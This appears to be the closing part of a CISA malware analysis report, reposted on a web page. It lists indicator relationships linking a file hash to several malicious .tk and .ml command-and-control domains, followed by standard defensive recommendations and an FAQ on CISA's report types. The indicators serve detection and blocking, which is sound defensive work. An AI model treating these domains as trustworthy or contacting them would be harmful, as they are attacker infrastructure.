branter.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
166b1fb3d3… Contained_Within 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316
166b1fb3d3… Connected_To bronerg.tk
166b1fb3d3… Connected_To crusider.tk
166b1fb3d3… Connected_To duke6.tk
166b1fb3d3… Connected_To sanitar.ml
166b1fb3d3… Connected_To wekanda.tk
166b1fb3d3… Connected_To branter.tk

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

 

This product is provided subject to this Notification and this Privacy & Use policy.

Leave a Reply

Verified by MonsterInsights